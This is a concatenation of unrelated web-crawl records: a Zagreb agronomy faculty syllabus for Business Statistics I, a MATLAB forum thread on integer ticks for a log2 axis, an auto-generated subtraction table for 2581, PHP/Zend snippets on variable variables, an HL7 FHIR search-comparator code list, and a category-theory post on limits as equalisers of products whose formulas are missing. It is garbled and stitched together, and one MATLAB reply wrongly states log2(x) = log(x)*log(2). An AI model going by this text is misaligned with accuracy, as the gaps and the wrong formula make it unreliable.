[ " Business Statistics I / BS Courses taught in English / / Sveučilište u Zagrebu Agronomski fakultet\n\n ECTS bodovi 6.00 Engleski jezik R1 E-učenje R1 Sati nastave 60 Predavanja 44 Vježbe u praktikumu 12 Seminar 4 Izvođač predavanja doc. dr. sc. Biserka Kolarec Izvođač vježbi doc. dr. sc. Biserka Kolarec Ocjenjivanje Dovoljan (2) 60-69% Dobar (3) 70-79 % Vrlo dobar (4) 80-89 % Izvrstan (5) 90 -100%\n\n## Nositelj predmeta", null, "doc. dr. sc. Biserka Kolarec\n\n## Opis predmeta\n\nThis module presents the basics of descriptive and inferential statistics in the context of agricultural economics. The part concerned with descriptive statistics pays special attention to organization, presentation, and interpretation of different types of data. The intention here is to develop an ability to critically assess and interpret statistical data and to avoid common pitfalls. A short review of basic concepts of probability is a bridge to the part devoted to the inferential statistics. This part starts by an introduction to discrete and continuous random variables and the most important distributions, followed by the classical topics of estimations and hypotheses testing about the mean and proportion.\n\n## Opće kompetencije\n\n- raising the level of statistical literacy\n- acquiring knowledge and skills necessary to understand, analyze and solve problems arising in the course of practical work\n- developing an ability to critically assess and interpret statistical data and to avoid common pitfalls\n- using statistical software with confidence\n\n## Oblici nastave\n\n• Assessments\n• Consultations\n• Lectures\nindividual work on concrete problems in order to acquire the level of statistical literacy necessary for understand, analyze and solve practical problems arising in the course of work in agricultural economics.\n• Practicum\non computers\n• Seminars\nsolving an individual problem\n\n## Ishodi učenja i način provjere\n\n Ishod učenja Način provjere organize data and present them grafically individual and practical work, project calculate numerical descriptive measures of data homework, exam, practical work apply Excel tools for descriptive statistics exam, practical work, project distinguish between discrete and continuous random variables and their probability distributions homework, practical work, project determinate probabilities and use statistical tables homework, practical work, project, exam construct confidence intervals for means and proportions homework, practical work, project set up a hypothesis and test it homework, practical work, project, exam be able to use mathematical software and interpret obtained results project work\n\n### Obaveze nastavnika\n\n1. Course planning\n2. Selection and creation of teaching materials\n3. Evaluation of course, teaching materials and curriculum\n4. Construct tests\n5. Grade students on the basis of their achievement\n\n### Obaveze studenta\n\n1. Attend lectures regularly\n2. Do homeworks and participate actively during lectures\n3. Write tests and win at least 25% of points on each test to get the signature\n4. Do individual projects\n\n## Polaganje ispita\n\nElementi praćenja Maksimalno bodova ili udio u ocjeni Bodovna skala ocjena Ocjena Broj sati izravne nastave Ukupni broj sati rada prosječnog studenta ECTS bodovi\n1st exam 40 % 60-69 %\n70-79 %\n80-89 %\n90-100 %\nDovoljan (2)\nDobar (3)\nVrlo dobar (4)\nIzvrstan (5)\n30 90 2\n2nd exam 30 % 60-69 %\n70-79 %\n80-89 %\n90-100 %\nDovoljan (2)\nDobar (3)\nVrlo dobar (4)\nIzvrstan (5)\n15 45 2\n3rd exam 30 % 60-69 %\n70-79 %\n80-89 %\n90-100 %\nDovoljan (2)\nDobar (3)\nVrlo dobar (4)\nIzvrstan (5)\n15 45 2\nTotal 100 % 60 180 6\n3rd exam interval estimations and hypothesis testing 16.th week\n\n## Tjedni plan nastave\n\n1. The purpose of statistics. Descriptive and inferential statistics. Basic concepts. Types of variables. Scales of measurement.\n2. Organizing and graphing of qualitative and quantitative data. Interpretation of different types of diagrams. Recognizing and avoiding common pitfalls.\n3. Measures of central tendency – mean, median and mode. Measures of dispersion. Measures of position.\n4. Index theory Measures of association Basic definitions and examples from the economic theory Types of measures of association\n5. Elements of probability I Experiment, outcomes and sample space. Three conceptual approaches to probability. Examples.\n6. Elements of probability II Dependent versus dependent events. Conditional probability. Bayes&#39; theorem.\n7. Discrete random variables and their probability distributions I Probability distribution of a discrete random variable. Mean and standard deviation. The binomial probability distribution.\n8. Discrete random variables and their probability distributions II The Poisson probability distribution. The hypergeometric probability distribution.\n9. Continuous random variables and their probability distributions I Continuous probability distribution. The normal distibution. The standard normal distribution. Applications.\n10. Continuous random variables and their probability distributions II The normal approximation to the binomial distribution.\n11. Populations and samples Random and nonrandom samples. Selecting a simple random sample. Sampling errors.\n12. Estimation of the mean Point and interval estimates. Interval estimation of a population mean for large and small samples. The t probability distribution\n13. Estimation of the proportion Interval estimates of a population proportion. Sample size determination.\n14. Hypothesis tests about the mean Hypothesis tests. Rejection and non-rejection regions. Two types of errors. Hypothesis tests about a population mean for large and small samples.\n15. Hypothesis tests about the proportion Hypothesis tests about a population proportion.\n\n## Obvezna literatura\n\n1. P.S. Mann, Statistics for Business and Economics, J. Wiley, N. Y., 2005.\n2. M. Silver: Business Statistics, Mc. Graw Hill, London, 1997.\n\n## Preporučena literatura\n\n1. L. Kazmier, Schaum&#39;s Easy Outline of Business Statistics, McGraw-Hill, N. Y., 2003.\n2. D. Huff, How to lie with statistics, WW Norton, N. Y., 1993.\n\n## Sličan predmet na srodnim sveučilištima\n\n• Matematik und Statistik, BOKU\n• Statistik, University of Hohenheim" ]
[ null, "https://djelatnici.agr.hr/multimedia/users/picture.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.74790704,"math_prob":0.83377624,"size":6267,"snap":"2019-51-2020-05","text_gpt3_token_len":1545,"char_repetition_ratio":0.13316302,"word_repetition_ratio":0.13076924,"special_character_ratio":0.22387107,"punctuation_ratio":0.1256182,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9780987,"pos_list":[0,1,2],"im_url_duplicate_count":[null,10,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-06T02:59:59Z\",\"WARC-Record-ID\":\"<urn:uuid:c519fbde-6400-4e6e-8dc2-23e94cf86f62>\",\"Content-Length\":\"34768\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f239babc-cc4f-40b6-aa4c-86342f8ee974>\",\"WARC-Concurrent-To\":\"<urn:uuid:065a972b-0a20-4827-9ae2-d5637ac08a8d>\",\"WARC-IP-Address\":\"31.147.204.159\",\"WARC-Target-URI\":\"http://www.agr.unizg.hr/hr/ects-en/bs_courses_taught_in_english/4/0/business_statistics_i/35\",\"WARC-Payload-Digest\":\"sha1:J3IR6QH6LLPA7NCRGRVINNDNUTRSVDOS\",\"WARC-Block-Digest\":\"sha1:DSPSC4JYWFOYWPRAG6GAKF4UCLRCXORI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540484477.5_warc_CC-MAIN-20191206023204-20191206051204-00408.warc.gz\"}"}
https://au.mathworks.com/matlabcentral/answers/579159-logarithmic-scale-with-a-different-base
[ "# Logarithmic scale with a different base\n\n55 views (last 30 days)\nIdo Gross on 13 Aug 2020\nAnswered: Walter Roberson on 13 Aug 2020\nHi,\nI am trying to plot a function using logaritmic scale on the x axis, with base 2.\nmy code is:\nN = 1:10000;\nM = 61;\nL = N-M+1;\nova_complex = ((N.*(log2(N)+1))./(N-M+1));\nfigure\nstem(log2(N),ova_complex)\nxlim([6 14])\nthe graph im getting is good, but i want to show only the integer values on the x axis(i.e. 6,7,8,9)\nis there a way to do that?\nthanks\n\nStar Strider on 13 Aug 2020\nTry this:\nN = 1:10000;\nM = 61;\nL = N-M+1;\nova_complex = ((N.*(log2(N)+1))./(N-M+1));\nfigure\nstem(log2(N),ova_complex)\nxlim([6 14])\nxt = get(gca, 'XTick'); % ADD THIS LINE\nxtl = fix(min(xt)):fix(max(xt)); % ADD THIS LINE\nset(gca, 'XTick',xtl) % ADD THIS LINE\nThat should produce integer ticks and integer tick labels.\n.\n\nhosein Javan on 13 Aug 2020\nax = gca; % current axe\nax.XTick = 6:14;\n\nWalter Roberson on 13 Aug 2020\nlog2(x) = log(x) *log(2)\nlog(2) is a uniform scaling and since plots are scaled to fit available space, becomes irrelevant.\nSo you get the same shape if you use semilogx. And you can lie with the labels if you want. However if you are using datatips you need your approach (unless you program them to lie)\nYou can use xticks() to choose integer tick locations." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7478965,"math_prob":0.97633594,"size":384,"snap":"2020-45-2020-50","text_gpt3_token_len":133,"char_repetition_ratio":0.09736842,"word_repetition_ratio":0.0,"special_character_ratio":0.37760416,"punctuation_ratio":0.1904762,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9934546,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-12-06T02:24:16Z\",\"WARC-Record-ID\":\"<urn:uuid:a839b97e-b226-4b6a-bfdf-a32ba2cfd252>\",\"Content-Length\":\"118298\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1896c1bf-5581-44a0-9260-b56ece5e8f59>\",\"WARC-Concurrent-To\":\"<urn:uuid:dadf9549-1933-42bf-a0bb-61fa6c01a866>\",\"WARC-IP-Address\":\"184.25.198.13\",\"WARC-Target-URI\":\"https://au.mathworks.com/matlabcentral/answers/579159-logarithmic-scale-with-a-different-base\",\"WARC-Payload-Digest\":\"sha1:6CZA5WH6ODFTGT4FN5HDVI4RJERJGAWR\",\"WARC-Block-Digest\":\"sha1:PQPDOZOGJY2L4HHO4HBW5JSX2TVO6U7J\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141753148.92_warc_CC-MAIN-20201206002041-20201206032041-00341.warc.gz\"}"}
http://num.bubble.ro/s/2581/806/
[ "# Substraction table for N = 2581 - 805÷806\n\n2581 - 805 = 1776 [+]\n2581 - 805.01 = 1775.99 [+]\n2581 - 805.02 = 1775.98 [+]\n2581 - 805.03 = 1775.97 [+]\n2581 - 805.04 = 1775.96 [+]\n2581 - 805.05 = 1775.95 [+]\n2581 - 805.06 = 1775.94 [+]\n2581 - 805.07 = 1775.93 [+]\n2581 - 805.08 = 1775.92 [+]\n2581 - 805.09 = 1775.91 [+]\n2581 - 805.1 = 1775.9 [+]\n2581 - 805.11 = 1775.89 [+]\n2581 - 805.12 = 1775.88 [+]\n2581 - 805.13 = 1775.87 [+]\n2581 - 805.14 = 1775.86 [+]\n2581 - 805.15 = 1775.85 [+]\n2581 - 805.16 = 1775.84 [+]\n2581 - 805.17 = 1775.83 [+]\n2581 - 805.18 = 1775.82 [+]\n2581 - 805.19 = 1775.81 [+]\n2581 - 805.2 = 1775.8 [+]\n2581 - 805.21 = 1775.79 [+]\n2581 - 805.22 = 1775.78 [+]\n2581 - 805.23 = 1775.77 [+]\n2581 - 805.24 = 1775.76 [+]\n2581 - 805.25 = 1775.75 [+]\n2581 - 805.26 = 1775.74 [+]\n2581 - 805.27 = 1775.73 [+]\n2581 - 805.28 = 1775.72 [+]\n2581 - 805.29 = 1775.71 [+]\n2581 - 805.3 = 1775.7 [+]\n2581 - 805.31 = 1775.69 [+]\n2581 - 805.32 = 1775.68 [+]\n2581 - 805.33 = 1775.67 [+]\n2581 - 805.34 = 1775.66 [+]\n2581 - 805.35 = 1775.65 [+]\n2581 - 805.36 = 1775.64 [+]\n2581 - 805.37 = 1775.63 [+]\n2581 - 805.38 = 1775.62 [+]\n2581 - 805.39 = 1775.61 [+]\n2581 - 805.4 = 1775.6 [+]\n2581 - 805.41 = 1775.59 [+]\n2581 - 805.42 = 1775.58 [+]\n2581 - 805.43 = 1775.57 [+]\n2581 - 805.44 = 1775.56 [+]\n2581 - 805.45 = 1775.55 [+]\n2581 - 805.46 = 1775.54 [+]\n2581 - 805.47 = 1775.53 [+]\n2581 - 805.48 = 1775.52 [+]\n2581 - 805.49 = 1775.51 [+]\n2581 - 805.5 = 1775.5 [+]\n2581 - 805.51 = 1775.49 [+]\n2581 - 805.52 = 1775.48 [+]\n2581 - 805.53 = 1775.47 [+]\n2581 - 805.54 = 1775.46 [+]\n2581 - 805.55 = 1775.45 [+]\n2581 - 805.56 = 1775.44 [+]\n2581 - 805.57 = 1775.43 [+]\n2581 - 805.58 = 1775.42 [+]\n2581 - 805.59 = 1775.41 [+]\n2581 - 805.6 = 1775.4 [+]\n2581 - 805.61 = 1775.39 [+]\n2581 - 805.62 = 1775.38 [+]\n2581 - 805.63 = 1775.37 [+]\n2581 - 805.64 = 1775.36 [+]\n2581 - 805.65 = 1775.35 [+]\n2581 - 805.66 = 1775.34 [+]\n2581 - 805.67 = 1775.33 [+]\n2581 - 805.68 = 1775.32 [+]\n2581 - 805.69 = 1775.31 [+]\n2581 - 805.7 = 1775.3 [+]\n2581 - 805.71 = 1775.29 [+]\n2581 - 805.72 = 1775.28 [+]\n2581 - 805.73 = 1775.27 [+]\n2581 - 805.74 = 1775.26 [+]\n2581 - 805.75 = 1775.25 [+]\n2581 - 805.76 = 1775.24 [+]\n2581 - 805.77 = 1775.23 [+]\n2581 - 805.78 = 1775.22 [+]\n2581 - 805.79 = 1775.21 [+]\n2581 - 805.8 = 1775.2 [+]\n2581 - 805.81 = 1775.19 [+]\n2581 - 805.82 = 1775.18 [+]\n2581 - 805.83 = 1775.17 [+]\n2581 - 805.84 = 1775.16 [+]\n2581 - 805.85 = 1775.15 [+]\n2581 - 805.86 = 1775.14 [+]\n2581 - 805.87 = 1775.13 [+]\n2581 - 805.88 = 1775.12 [+]\n2581 - 805.89 = 1775.11 [+]\n2581 - 805.9 = 1775.1 [+]\n2581 - 805.91 = 1775.09 [+]\n2581 - 805.92 = 1775.08 [+]\n2581 - 805.93 = 1775.07 [+]\n2581 - 805.94 = 1775.06 [+]\n2581 - 805.95 = 1775.05 [+]\n2581 - 805.96 = 1775.04 [+]\n2581 - 805.97 = 1775.03 [+]\n2581 - 805.98 = 1775.02 [+]\n2581 - 805.99 = 1775.01 [+]\nNavigation: Home | Addition | Substraction | Multiplication | Division       Tables for 2581: Addition | Substraction | Multiplication | Division\n\nOperand: 1 2 3 4 5 6 7 8 9 10 20 30 40 50 60 70 80 90 100 200 300 400 500 600 700 800 801 802 803 804 805 806 807 808 809 900 1000 2000 3000 4000 5000 6000 7000 8000 9000\n\nSubstraction for: 1 2 3 4 5 6 7 8 9 10 20 30 40 50 60 70 80 90 100 200 300 400 500 600 700 800 900 1000 2000 2581 2582 2583 2584 2585 2586 2587 2588 2589 3000 4000 5000 6000 7000 8000 9000" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8587403,"math_prob":0.99984634,"size":17441,"snap":"2020-45-2020-50","text_gpt3_token_len":4241,"char_repetition_ratio":0.39117968,"word_repetition_ratio":0.52095133,"special_character_ratio":0.28736883,"punctuation_ratio":0.064896755,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9986272,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-30T01:29:14Z\",\"WARC-Record-ID\":\"<urn:uuid:55f1bd43-ff74-4428-be64-e82736637514>\",\"Content-Length\":\"49146\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f596da80-5df3-4fd7-9f76-f7f3875f4f88>\",\"WARC-Concurrent-To\":\"<urn:uuid:0ca68d73-22b7-4897-ad71-fe77adcb7836>\",\"WARC-IP-Address\":\"172.67.221.34\",\"WARC-Target-URI\":\"http://num.bubble.ro/s/2581/806/\",\"WARC-Payload-Digest\":\"sha1:IVCLPP5NFRGCOB4QT2NL7WF4FQMV6L2O\",\"WARC-Block-Digest\":\"sha1:5YM3TNZMJ3M2QJR2KEMEH3KVT5FVXZAB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107906872.85_warc_CC-MAIN-20201030003928-20201030033928-00399.warc.gz\"}"}
https://number1.co.za/2013/11/
[ "# Add Events to Zend_Forms Zend Framework\n\n``` \\$type = new Zend_Form_Element_Select('type',array('onchange' => 'alert(\"working\")')); ```\n\n# using PHP Values as Variable names and to call Functions\n\nThis should apply to perl as well:\n\nVariable name:\n\n```\\$myvar = 'foo'; \\${\\$myvar} = 'haswell'; echo \\$foo RESULT 'haswell'```\n\nCall a function:\n\n```\\$type = 'red'; \\$myClass->\\$type(); == \\$myClass->red();```\n\nTaken from:\n\n``` \\${\"variableName\"} = 12; {\"functionName\"}();```\n\n``` \\$className->{\"variableName\"}; \\$className->{\"methodName\"}(); ```\n\n```StaticClass::\\${\"variableName\"}; StaticClass::{\"methodName\"}(); ```\n\nAre there any other Languages that can do this, I know Perl Can...\n\nAnd What is this ability called?\n\n``` foreach (array_expression as \\$key => \\$value) { echo \\$key; } ```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5916817,"math_prob":0.78425336,"size":787,"snap":"2021-43-2021-49","text_gpt3_token_len":205,"char_repetition_ratio":0.107279696,"word_repetition_ratio":0.0,"special_character_ratio":0.29860228,"punctuation_ratio":0.22137405,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95663184,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-28T07:24:39Z\",\"WARC-Record-ID\":\"<urn:uuid:87c854d1-ce76-4e39-af28-7d642df7a6bb>\",\"Content-Length\":\"48037\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2fa6bce4-b13c-4cdf-8812-de7d5d9dc391>\",\"WARC-Concurrent-To\":\"<urn:uuid:8e3224d9-a313-4ac3-bc4e-6b4955a686c5>\",\"WARC-IP-Address\":\"37.139.28.74\",\"WARC-Target-URI\":\"https://number1.co.za/2013/11/\",\"WARC-Payload-Digest\":\"sha1:AIGDO55OHB5ZJVFGRHY77CAQV2VCED5B\",\"WARC-Block-Digest\":\"sha1:VLZNK6TVAEOMBTVVLHTITUT37O4PO5Z3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323588282.80_warc_CC-MAIN-20211028065732-20211028095732-00348.warc.gz\"}"}
http://build.fhir.org/codesystem-search-comparator.canonical.xml
[ "This code system http://hl7.org/fhir/search-comparator defines the following codes:\n\n Code Display Definition eq Equals the value for the parameter in the resource is equal to the provided value. ne Not Equals the value for the parameter in the resource is not equal to the provided value. gt Greater Than the value for the parameter in the resource is greater than the provided value. lt Less Than the value for the parameter in the resource is less than the provided value. ge Greater or Equals the value for the parameter in the resource is greater or equal to the provided value. le Less of Equal the value for the parameter in the resource is less or equal to the provided value. sa Starts After the value for the parameter in the resource starts after the provided value. eb Ends Before the value for the parameter in the resource ends before the provided value. ap Approximately the value for the parameter in the resource is approximately the same to the provided value.\n<status value=\"draft\"/><experimental value=\"false\"/><date value=\"2021-01-05T10:01:24+11:00\"/><publisher value=\"HL7 (FHIR Project)\"/><contact><telecom><system value=\"url\"/><value value=\"http://hl7.org/fhir\"/></telecom><telecom><system value=\"email\"/><value value=\"[email protected]\"/></telecom></contact><description value=\"What Search Comparator Codes are supported in search.\"/><caseSensitive value=\"true\"/><valueSet value=\"http://hl7.org/fhir/ValueSet/search-comparator\"/><content value=\"complete\"/><concept><code value=\"eq\"/><display value=\"Equals\"/><definition value=\"the value for the parameter in the resource is equal to the provided value.\"/></concept><concept><code value=\"ne\"/><display value=\"Not Equals\"/><definition value=\"the value for the parameter in the resource is not equal to the provided value.\"/></concept><concept><code value=\"gt\"/><display value=\"Greater Than\"/><definition value=\"the value for the parameter in the resource is greater than the provided value.\"/></concept><concept><code value=\"lt\"/><display value=\"Less Than\"/><definition value=\"the value for the parameter in the resource is less than the provided value.\"/></concept><concept><code value=\"ge\"/><display value=\"Greater or Equals\"/><definition value=\"the value for the parameter in the resource is greater or equal to the provided value.\"/></concept><concept><code value=\"le\"/><display value=\"Less of Equal\"/><definition value=\"the value for the parameter in the resource is less or equal to the provided value.\"/></concept><concept><code value=\"sa\"/><display value=\"Starts After\"/><definition value=\"the value for the parameter in the resource starts after the provided value.\"/></concept><concept><code value=\"eb\"/><display value=\"Ends Before\"/><definition value=\"the value for the parameter in the resource ends before the provided value.\"/></concept><concept><code value=\"ap\"/><display value=\"Approximately\"/><definition value=\"the value for the parameter in the resource is approximately the same to the provided value.\"/></concept></CodeSystem>" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.51535994,"math_prob":0.9747548,"size":1006,"snap":"2022-05-2022-21","text_gpt3_token_len":220,"char_repetition_ratio":0.22055888,"word_repetition_ratio":0.35151514,"special_character_ratio":0.21471173,"punctuation_ratio":0.06451613,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9669392,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-19T23:28:47Z\",\"WARC-Record-ID\":\"<urn:uuid:4421049b-b2a3-4e39-9ba3-015c9fd45c44>\",\"Content-Length\":\"7231\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:15d4161b-37e9-47ac-bdca-107ca72e70a1>\",\"WARC-Concurrent-To\":\"<urn:uuid:d4b4955a-ba97-4628-a7b4-28f544aa1701>\",\"WARC-IP-Address\":\"35.190.153.146\",\"WARC-Target-URI\":\"http://build.fhir.org/codesystem-search-comparator.canonical.xml\",\"WARC-Payload-Digest\":\"sha1:WVUYI2DMY7HDIMOENGDGM4BIPWUO6XHM\",\"WARC-Block-Digest\":\"sha1:MZFCLR4JRK6EMA56ZANA4XK7GCWOL2WD\",\"WARC-Identified-Payload-Type\":\"application/xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320301592.29_warc_CC-MAIN-20220119215632-20220120005632-00166.warc.gz\"}"}
https://lovelylittlelemmas.rjprojects.net/limits-as-equalisers-of-products/
[ "# Limits as equalisers of products\n\nThe first and second corollary below are well-known category theory lemmas. We give a slightly different argument than usual (i.e. we took a trivial result and changed it into something much more complicated).\n\nHere is a lovely little definition:\n\nDefinition. Given a small diagram", null, "of sets, write", null, "for the small category with", null, "and morphisms", null, "for", null, "and", null, "(where", null, "), with composition induced by composition of maps", null, ".\n\nExample 1. If", null, ", then a diagram", null, "is a pair of sets", null, "with parallel arrows", null, ". Then", null, "looks like a ‘bipartite preorder’ where every source object has outgoing valence", null, ":", null, "Example 2. Given a set", null, ", write", null, "for the discrete category on", null, ", i.e.", null, "and", null, "If", null, "is itself a discrete category, then", null, "is just a collection", null, "of sets, and", null, "Remark. Giving a functor", null, "is the same thing as giving functors", null, "and natural transformations", null, "of functors", null, "for all", null, "in", null, ", such that", null, "for all", null, "in", null, "(where", null, "denotes horizontal composition of natural transformations, as in Tag 003G).\n\nExample 3.  Let", null, "be a small category, and consider the diagram", null, "given by the source and target maps", null, ". Then we have a functor", null, "given on objects by", null, "and on morphisms by", null, "In terms of the remark above, it is given by the functors", null, "taking", null, "to", null, "and the natural inclusion", null, ", along with the natural transformations", null, "We can now formulate the main result.\n\nLemma. Let", null, "be a small category. hen the functor", null, "of Example 3 is cofinal.\n\nRecall that a functor", null, "is cofinal if for all", null, ", the comma category", null, "is nonemptry and connected. See also Tag 04E6 for a concrete translation of this definition.\n\nProof. Let", null, ". Since", null, ", the identity", null, "gives the object", null, "in", null, ", showing nonemptyness. For connectedness, it suffices to connect any", null, "(i.e.", null, ") to the identity", null, ") (i.e.", null, "). If", null, ", then the commutative diagram", null, "gives a zigzag", null, "of morphisms in", null, "connecting", null, "to", null, ". If instead", null, ", we can skip the first step, and the diagram", null, "gives a zigzag", null, "connecting", null, "to", null, ".", null, "Corollary 1. Let", null, "be a small diagram in a category", null, "with small products. Then there is a canonical isomorphism", null, "provided that either side exists.\n\nProof. By the lemma, the functor", null, "is initial. Hence by Tag 002R, the natural morphism", null, "is an isomorphism if either side exists. But", null, "is a category as in Example 1, and it’s easy to see that the limit over a diagram", null, "is computed as the equaliser of a pair of arrows between the products.", null, "Of course this is not an improvement of the traditional proof, because the “it’s easy to see” step at the end is very close to the same statement as the corollary in the special case where", null, "is of the form", null, "for some", null, ". But it’s fun to move the argument almost entirely away from limits and into the index category.\n\nCorollary 2. Let", null, "be a category that has small products and equalisers of parallel pairs of arrows. Then", null, "is (small) complete.", null, "" ]
[ null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-51068fe2a36403636ed5fe4916a9c7e5_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-267546e1bc8173b01c501fc60f1e305b_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-4e02977ba08ed15e4450c4cd2138fbb5_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-ac14539cfc0c404b51a2d52826838078_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-9766dab0e965a5dc216f1904cf8d4f8f_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-b117e14276c8591a1b697ac36aecab2d_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-08d6f52e51547b5a5bde4a0c2014c729_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-4fe012527d4046f7572859416e98db3a_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-d3d02118e40450d3496d960441da453b_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-ea829a1a917780f8f1e914af42c65256_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-3e5f055543c684c62925a5dc85ea0c14_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-f76470fc6a930d19553502a7c8c0476f_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-267546e1bc8173b01c501fc60f1e305b_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-4ea2644bcccbf698d19e45c913c0c0b4_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-3dad4905bde74cc465592974829af771_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-8b04cd340e234f344ec091bdd203bd99_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-714abc6bc11f2c311b779988ac248397_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-8b04cd340e234f344ec091bdd203bd99_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-1ce551bc46d36db8120babbdbd46f44a_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-17fb2a0014459208d7a6901c497bf20c_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-3abf7dcf039cd59d84efd542ea35cd8a_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-ea829a1a917780f8f1e914af42c65256_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-efbc33b4d0ba3999ed5d37b190167f76_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-f1e076751a68f543e7ce61d8115d3104_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-31df41f6e0342044a2c260a0da4d2c99_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-07dd3b99de0a35eb57a877510c861f1f_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-f0896565bef68248ec2c6edea41de7bf_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-ac72c4e2a41c4487bc4262e39d33c326_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-c03673f86656fc23613166ed7912d288_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-387bc32ba2d731f56de80916da2adf3c_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-aa33453a1e48d3640e794fabebbe53ee_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-7d9e42da293e2d1d8ebfe6815e4c6a3d_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-387bc32ba2d731f56de80916da2adf3c_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-34cd33d03bb56da06e79574d6ecc96a2_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-387bc32ba2d731f56de80916da2adf3c_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-ddfc119fb73664240c67e849be650e79_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-2b0de8ab12e1df0974f3e476ff17d376_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-3e483eb78491fab528458d329c6ba5bf_l3.svg", null, "https://lovelylittlelemmas.rjprojects.net/wp-content/ql-cache/quicklatex.com-8ae5639a9a720646418db2073d361a7a_l3.svg", null, 